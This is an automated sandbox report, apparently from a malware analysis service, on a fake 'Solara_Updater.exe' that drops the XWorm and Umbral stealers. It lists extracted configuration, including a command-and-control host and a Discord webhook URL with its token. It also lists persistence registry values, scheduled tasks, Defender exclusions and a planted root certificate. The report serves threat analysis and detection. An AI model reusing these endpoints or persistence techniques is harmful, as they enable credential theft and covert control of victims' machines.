Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
19-05-2024 16:15
Static task
static1
Behavioral task
behavioral1
Sample
Solara_Updater.exe
Resource
win7-20240508-en
General
-
Target
Solara_Updater.exe
-
Size
1.9MB
-
MD5
f4cffd7e6cca2b88bba1f19120e9255f
-
SHA1
28df62794d325206d1f61a400b5c5c682632e371
-
SHA256
4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
-
SHA512
cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
-
SSDEEP
49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i
Malware Config
Extracted
xworm
answer-riverside.gl.at.ply.gg:45691
-
Install_directory
%AppData%
-
install_file
svhost.exe
Extracted
umbral
https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V
Signatures
-
Detect Umbral payload 7 IoCs
resource yara_rule behavioral1/files/0x0007000000015cf0-47.dat family_umbral behavioral1/memory/276-49-0x0000000001210000-0x0000000001250000-memory.dmp family_umbral behavioral1/memory/2660-276-0x0000000000110000-0x0000000000150000-memory.dmp family_umbral behavioral1/memory/2872-337-0x0000000000D00000-0x0000000000D40000-memory.dmp family_umbral behavioral1/memory/2236-381-0x0000000000370000-0x00000000003B0000-memory.dmp family_umbral behavioral1/memory/2268-497-0x0000000000800000-0x0000000000840000-memory.dmp family_umbral behavioral1/memory/484-600-0x0000000000E30000-0x0000000000E70000-memory.dmp family_umbral -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0009000000015ce8-41.dat family_xworm behavioral1/memory/1956-48-0x0000000000D40000-0x0000000000D56000-memory.dmp family_xworm behavioral1/memory/2136-403-0x0000000001250000-0x0000000001266000-memory.dmp family_xworm behavioral1/memory/2704-588-0x0000000000140000-0x0000000000156000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\taskhost.exe\", \"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\", \"C:\\Program Files\\7-Zip\\Loader.exe\", \"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\", \"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 948 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1328 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1788 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2544 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1800 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2424 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2644 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1264 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2904 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2716 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2700 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 264 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 628 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 696 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 1196 schtasks.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1676 1196 schtasks.exe 23 -
Blocklisted process makes network request 1 IoCs
flow pid Process 34 1992 Loader.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2812 powershell.exe 1624 powershell.exe 2532 powershell.exe 2884 powershell.exe 2516 powershell.exe 808 powershell.exe 2136 powershell.exe 1632 powershell.exe 2656 powershell.exe -
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 2888 Loader.exe 2160 sol.exe 2604 Loader.exe 2640 sol.exe 1616 Loader.exe 2772 sol.exe 1956 XClient.exe 276 RustCheat.exe 2316 Loader.exe 764 sol.exe 2528 Loader.exe 1528 sol.exe 948 Loader.exe 3040 sol.exe 2112 Loader.exe 2812 sol.exe 2596 Loader.exe 2992 sol.exe 2676 Loader.exe 1152 sol.exe 2696 Loader.exe 1664 sol.exe 2496 Loader.exe 288 sol.exe 2768 Loader.exe 332 sol.exe 1680 bridgeblockportComBroker.exe 1792 Loader.exe 2812 sol.exe 2792 bridgeblockportComBroker.exe 2584 XClient.exe 2096 RustCheat.exe 1864 Loader.exe 796 sol.exe 1852 bridgeblockportComBroker.exe 2144 Loader.exe 496 sol.exe 2440 bridgeblockportComBroker.exe 1612 Loader.exe 1152 sol.exe 2836 bridgeblockportComBroker.exe 2564 Loader.exe 1660 sol.exe 2156 bridgeblockportComBroker.exe 948 Loader.exe 1536 sol.exe 760 sppsvc.exe 1976 bridgeblockportComBroker.exe 1476 Loader.exe 876 sol.exe 2980 bridgeblockportComBroker.exe 1752 Loader.exe 2912 sol.exe 1444 bridgeblockportComBroker.exe 1660 Loader.exe 2308 sol.exe 2552 bridgeblockportComBroker.exe 2284 Loader.exe 2880 sol.exe 3040 bridgeblockportComBroker.exe 2748 Loader.exe 1508 sol.exe 1148 XClient.exe 2660 RustCheat.exe -
Loads dropped DLL 58 IoCs
pid Process 2100 cmd.exe 2100 cmd.exe 2928 cmd.exe 2600 cmd.exe 1212 cmd.exe 1228 cmd.exe 2816 cmd.exe 2116 cmd.exe 2196 cmd.exe 1940 cmd.exe 768 cmd.exe 1912 cmd.exe 2580 cmd.exe 3060 cmd.exe 1116 cmd.exe 2480 cmd.exe 2152 cmd.exe 2696 cmd.exe 668 cmd.exe 2752 cmd.exe 2336 cmd.exe 884 cmd.exe 1800 cmd.exe 1740 cmd.exe 1856 cmd.exe 2232 cmd.exe 2580 cmd.exe 2968 cmd.exe 1872 cmd.exe 1296 cmd.exe 2716 cmd.exe 1028 cmd.exe 316 cmd.exe 540 cmd.exe 2020 cmd.exe 1720 cmd.exe 2760 cmd.exe 1560 cmd.exe 1852 cmd.exe 1648 cmd.exe 2416 cmd.exe 2092 cmd.exe 1728 cmd.exe 468 cmd.exe 1932 cmd.exe 316 cmd.exe 2760 cmd.exe 1856 cmd.exe 2720 cmd.exe 1208 cmd.exe 2544 cmd.exe 2304 cmd.exe 2532 cmd.exe 2868 cmd.exe 2908 cmd.exe 2896 cmd.exe 2564 cmd.exe 668 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\PCHEALTH\\ERRORREP\\QHEADLES\\System.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8f60a382-0d98-11ef-817d-5aba25856535\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Mail\\en-US\\sppsvc.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\hostNet\\taskhost.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Program Files\\7-Zip\\Loader.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Program Files\\7-Zip\\Loader.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\hostNet\\taskhost.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" XClient.exe -
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 33 ip-api.com 44 ip-api.com 57 ip-api.com 2 ip-api.com 10 ipinfo.io 13 ip-api.com 27 ip-api.com 59 ip-api.com 9 ipinfo.io -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\bsgne1.exe csc.exe File created \??\c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP csc.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Windows Mail\en-US\sppsvc.exe bridgeblockportComBroker.exe File created C:\Program Files\Windows Mail\en-US\0a1fd5f707cd16 bridgeblockportComBroker.exe File created C:\Program Files\7-Zip\Loader.exe bridgeblockportComBroker.exe File created C:\Program Files\7-Zip\87ba48885c7d9e bridgeblockportComBroker.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe bridgeblockportComBroker.exe File opened for modification C:\Windows\PCHEALTH\ERRORREP\QHEADLES\System.exe bridgeblockportComBroker.exe File created C:\Windows\PCHEALTH\ERRORREP\QHEADLES\27d1bcfc3c54e0 bridgeblockportComBroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1452 schtasks.exe 1800 schtasks.exe 2424 schtasks.exe 2904 schtasks.exe 2976 schtasks.exe 2256 schtasks.exe 1328 schtasks.exe 1788 schtasks.exe 2700 schtasks.exe 264 schtasks.exe 2716 schtasks.exe 696 schtasks.exe 948 schtasks.exe 2544 schtasks.exe 2644 schtasks.exe 1264 schtasks.exe 2680 schtasks.exe 628 schtasks.exe 1676 schtasks.exe -
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2564 wmic.exe 2580 wmic.exe 2012 wmic.exe 2408 wmic.exe 1648 wmic.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 bridgeblockportComBroker.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 bridgeblockportComBroker.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 996 PING.EXE 1140 PING.EXE 2940 PING.EXE 2916 PING.EXE 668 PING.EXE 2408 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 760 sppsvc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe 1680 bridgeblockportComBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2888 Loader.exe Token: SeDebugPrivilege 1956 XClient.exe Token: SeDebugPrivilege 276 RustCheat.exe Token: SeIncreaseQuotaPrivilege 2376 wmic.exe Token: SeSecurityPrivilege 2376 wmic.exe Token: SeTakeOwnershipPrivilege 2376 wmic.exe Token: SeLoadDriverPrivilege 2376 wmic.exe Token: SeSystemProfilePrivilege 2376 wmic.exe Token: SeSystemtimePrivilege 2376 wmic.exe Token: SeProfSingleProcessPrivilege 2376 wmic.exe Token: SeIncBasePriorityPrivilege 2376 wmic.exe Token: SeCreatePagefilePrivilege 2376 wmic.exe Token: SeBackupPrivilege 2376 wmic.exe Token: SeRestorePrivilege 2376 wmic.exe Token: SeShutdownPrivilege 2376 wmic.exe Token: SeDebugPrivilege 2376 wmic.exe Token: SeSystemEnvironmentPrivilege 2376 wmic.exe Token: SeRemoteShutdownPrivilege 2376 wmic.exe Token: SeUndockPrivilege 2376 wmic.exe Token: SeManageVolumePrivilege 2376 wmic.exe Token: 33 2376 wmic.exe Token: 34 2376 wmic.exe Token: 35 2376 wmic.exe Token: SeIncreaseQuotaPrivilege 2376 wmic.exe Token: SeSecurityPrivilege 2376 wmic.exe Token: SeTakeOwnershipPrivilege 2376 wmic.exe Token: SeLoadDriverPrivilege 2376 wmic.exe Token: SeSystemProfilePrivilege 2376 wmic.exe Token: SeSystemtimePrivilege 2376 wmic.exe Token: SeProfSingleProcessPrivilege 2376 wmic.exe Token: SeIncBasePriorityPrivilege 2376 wmic.exe Token: SeCreatePagefilePrivilege 2376 wmic.exe Token: SeBackupPrivilege 2376 wmic.exe Token: SeRestorePrivilege 2376 wmic.exe Token: SeShutdownPrivilege 2376 wmic.exe Token: SeDebugPrivilege 2376 wmic.exe Token: SeSystemEnvironmentPrivilege 2376 wmic.exe Token: SeRemoteShutdownPrivilege 2376 wmic.exe Token: SeUndockPrivilege 2376 wmic.exe Token: SeManageVolumePrivilege 2376 wmic.exe Token: 33 2376 wmic.exe Token: 34 2376 wmic.exe Token: 35 2376 wmic.exe Token: SeDebugPrivilege 1616 Loader.exe Token: SeDebugPrivilege 1680 bridgeblockportComBroker.exe Token: SeDebugPrivilege 2792 bridgeblockportComBroker.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2584 XClient.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 1792 Loader.exe Token: SeIncreaseQuotaPrivilege 2772 wmic.exe Token: SeSecurityPrivilege 2772 wmic.exe Token: SeTakeOwnershipPrivilege 2772 wmic.exe Token: SeLoadDriverPrivilege 2772 wmic.exe Token: SeSystemProfilePrivilege 2772 wmic.exe Token: SeSystemtimePrivilege 2772 wmic.exe Token: SeProfSingleProcessPrivilege 2772 wmic.exe Token: SeIncBasePriorityPrivilege 2772 wmic.exe Token: SeCreatePagefilePrivilege 2772 wmic.exe Token: SeBackupPrivilege 2772 wmic.exe Token: SeRestorePrivilege 2772 wmic.exe Token: SeShutdownPrivilege 2772 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2136 wrote to memory of 2888 2136 Solara_Updater.exe 29 PID 2136 wrote to memory of 2888 2136 Solara_Updater.exe 29 PID 2136 wrote to memory of 2888 2136 Solara_Updater.exe 29 PID 2136 wrote to memory of 2160 2136 Solara_Updater.exe 30 PID 2136 wrote to memory of 2160 2136 Solara_Updater.exe 30 PID 2136 wrote to memory of 2160 2136 Solara_Updater.exe 30 PID 2136 wrote to memory of 2160 2136 Solara_Updater.exe 30 PID 2136 wrote to memory of 1152 2136 Solara_Updater.exe 31 PID 2136 wrote to memory of 1152 2136 Solara_Updater.exe 31 PID 2136 wrote to memory of 1152 2136 Solara_Updater.exe 31 PID 2160 wrote to memory of 2828 2160 sol.exe 32 PID 2160 wrote to memory of 2828 2160 sol.exe 32 PID 2160 wrote to memory of 2828 2160 sol.exe 32 PID 2160 wrote to memory of 2828 2160 sol.exe 32 PID 1152 wrote to memory of 2604 1152 Solara_Updater.exe 33 PID 1152 wrote to memory of 2604 1152 Solara_Updater.exe 33 PID 1152 wrote to memory of 2604 1152 Solara_Updater.exe 33 PID 1152 wrote to memory of 2640 1152 Solara_Updater.exe 34 PID 1152 wrote to memory of 2640 1152 Solara_Updater.exe 34 PID 1152 wrote to memory of 2640 1152 Solara_Updater.exe 34 PID 1152 wrote to memory of 2640 1152 Solara_Updater.exe 34 PID 1152 wrote to memory of 2484 1152 Solara_Updater.exe 35 PID 1152 wrote to memory of 2484 1152 Solara_Updater.exe 35 PID 1152 wrote to memory of 2484 1152 Solara_Updater.exe 35 PID 2640 wrote to memory of 1348 2640 sol.exe 36 PID 2640 wrote to memory of 1348 2640 sol.exe 36 PID 2640 wrote to memory of 1348 2640 sol.exe 36 PID 2640 wrote to memory of 1348 2640 sol.exe 36 PID 2484 wrote to memory of 1616 2484 Solara_Updater.exe 37 PID 2484 wrote to memory of 1616 2484 Solara_Updater.exe 37 PID 2484 wrote to memory of 1616 2484 Solara_Updater.exe 37 PID 2484 wrote to memory of 2772 2484 Solara_Updater.exe 38 PID 2484 wrote to memory of 2772 2484 Solara_Updater.exe 38 PID 2484 wrote to memory of 2772 2484 Solara_Updater.exe 38 PID 2484 wrote to memory of 2772 2484 Solara_Updater.exe 38 PID 2484 wrote to memory of 2768 2484 Solara_Updater.exe 39 PID 2484 wrote to memory of 2768 2484 Solara_Updater.exe 39 PID 2484 wrote to memory of 2768 2484 Solara_Updater.exe 39 PID 2772 wrote to memory of 1624 2772 sol.exe 40 PID 2772 wrote to memory of 1624 2772 sol.exe 40 PID 2772 wrote to memory of 1624 2772 sol.exe 40 PID 2772 wrote to memory of 1624 2772 sol.exe 40 PID 2888 wrote to memory of 1956 2888 Loader.exe 41 PID 2888 wrote to memory of 1956 2888 Loader.exe 41 PID 2888 wrote to memory of 1956 2888 Loader.exe 41 PID 2888 wrote to memory of 276 2888 Loader.exe 42 PID 2888 wrote to memory of 276 2888 Loader.exe 42 PID 2888 wrote to memory of 276 2888 Loader.exe 42 PID 276 wrote to memory of 2376 276 RustCheat.exe 43 PID 276 wrote to memory of 2376 276 RustCheat.exe 43 PID 276 wrote to memory of 2376 276 RustCheat.exe 43 PID 2768 wrote to memory of 2316 2768 Solara_Updater.exe 45 PID 2768 wrote to memory of 2316 2768 Solara_Updater.exe 45 PID 2768 wrote to memory of 2316 2768 Solara_Updater.exe 45 PID 2768 wrote to memory of 764 2768 Solara_Updater.exe 46 PID 2768 wrote to memory of 764 2768 Solara_Updater.exe 46 PID 2768 wrote to memory of 764 2768 Solara_Updater.exe 46 PID 2768 wrote to memory of 764 2768 Solara_Updater.exe 46 PID 2768 wrote to memory of 2856 2768 Solara_Updater.exe 47 PID 2768 wrote to memory of 2856 2768 Solara_Updater.exe 47 PID 2768 wrote to memory of 2856 2768 Solara_Updater.exe 47 PID 764 wrote to memory of 536 764 sol.exe 48 PID 764 wrote to memory of 536 764 sol.exe 48 PID 764 wrote to memory of 536 764 sol.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 2804 attrib.exe 836 attrib.exe 1740 attrib.exe 644 attrib.exe 1792 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
